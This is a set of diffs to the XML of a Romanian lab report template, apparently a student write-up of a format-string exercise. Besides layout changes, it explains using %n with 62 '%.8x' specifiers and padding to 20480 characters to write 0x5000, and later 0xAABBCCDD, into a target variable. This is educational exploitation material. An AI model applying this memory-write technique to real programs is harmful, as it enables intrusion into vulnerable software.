       <w:pgMar w:left="1440" w:right="1440" w:header="720" w:top="777" w:footer="0" w:bottom="1440" w:gutter="0"/>

--- a/L02/SablonRaportL02.docx
+++ b/L02/SablonRaportL02.docx
@@ -1463,171 +1463,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="1080" w:hanging="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="1080" w:hanging="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="1080" w:hanging="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="1080" w:hanging="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="1080" w:hanging="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="1080" w:hanging="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="1080" w:hanging="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="1080" w:hanging="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="1080" w:hanging="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="1080" w:hanging="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="1080" w:hanging="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading3"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
@@ -1646,15 +1481,145 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Se observa ca adresa targeturlui este afisata la stdout din 2 caractere: h și spațiu liber: 5000 în baza 16 reprezninta 20480 în decimal. Deci, înainte de specificatorul %n trebuie afisate 20480 de caractere pentru a fi stocat în variabila target valoarea 5000 în baza 16 (20480). Pentru ca doua caractere sunt consumate de afisarea adresei, va trebui să facem padding la afisarea în hexa pentru a afisa restul de 20478 de caractere. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:t>Construim un build_string.py care sa construiască input-ul necesar acestei operatii; STIIM ca al 64 specificator face referire la variabila încărcata pe stiva, în cazul nostru adresa variabile target; %n- va scrie la adresa aceasta valoarea caracterelor afisate pana la întâlnirea specificatorului; ca idee-&gt; vom accesa primele 62 de valori de pe stiva cu specificatorul „</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:t>%.8x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:t xml:space="preserve">”, urmând apoi a 63-a valoare la care ii facem padding cu numărul de caractere ramase pana la atingerea numarului de  20480 (0x5000) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:left="720" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="11">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>107315</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>-86360</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5878195" cy="4975225"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="10" name="Image10" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="10" name="Image10" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5878195" cy="4975225"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:left="720" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:tab/>
+        <w:tab/>
+        <w:tab/>
+        <w:tab/>
+        <w:tab/>
+        <w:tab/>
+        <w:tab/>
+        <w:tab/>
+        <w:tab/>
       </w:r>
     </w:p>
     <w:p>
@@ -1794,7 +1759,7 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId11"/>
+      <w:headerReference w:type="default" r:id="rId12"/>
       <w:type w:val="nextPage"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:left="1440" w:right="1440" w:header="720" w:top="777" w:footer="0" w:bottom="1440" w:gutter="0"/>
@@ -2399,6 +2364,143 @@
   <w:abstractNum w:abstractNumId="5">
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
       <w:numFmt w:val="none"/>
       <w:suff w:val="nothing"/>
       <w:lvlText w:val=""/>
@@ -2529,6 +2631,9 @@
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="6"/>
   </w:num>
 </w:numbering>
 </file>

--- a/L02/SablonRaportL02.docx
+++ b/L02/SablonRaportL02.docx
@@ -1619,7 +1619,6 @@
         <w:tab/>
         <w:tab/>
         <w:tab/>
-        <w:tab/>
       </w:r>
     </w:p>
     <w:p>
@@ -1651,6 +1650,185 @@
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="12">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-50800</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>121285</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="6196965"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="11" name="Image11" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="11" name="Image11" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="6196965"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:t>Am obținut valoarea 0xAABBCCDD în target</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="13">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>-5715</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="2294255"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="12" name="Image12" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="12" name="Image12" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2294255"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
       </w:r>
     </w:p>
     <w:p>
@@ -1759,7 +1937,7 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId12"/>
+      <w:headerReference w:type="default" r:id="rId14"/>
       <w:type w:val="nextPage"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:left="1440" w:right="1440" w:header="720" w:top="777" w:footer="0" w:bottom="1440" w:gutter="0"/>
@@ -2501,6 +2679,143 @@
   <w:abstractNum w:abstractNumId="6">
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
       <w:numFmt w:val="none"/>
       <w:suff w:val="nothing"/>
       <w:lvlText w:val=""/>
@@ -2634,6 +2949,9 @@
   </w:num>
   <w:num w:numId="6">
     <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="7"/>
   </w:num>
 </w:numbering>
 </file>

--- a/L02/SablonRaportL02.docx
+++ b/L02/SablonRaportL02.docx
@@ -336,10 +336,10 @@
           <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="4">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:align>center</wp:align>
+              <wp:posOffset>-40640</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>635</wp:posOffset>
+              <wp:posOffset>-26670</wp:posOffset>
             </wp:positionV>
             <wp:extent cx="5943600" cy="1385570"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
@@ -1700,34 +1700,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="6"/>
@@ -1805,34 +1777,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
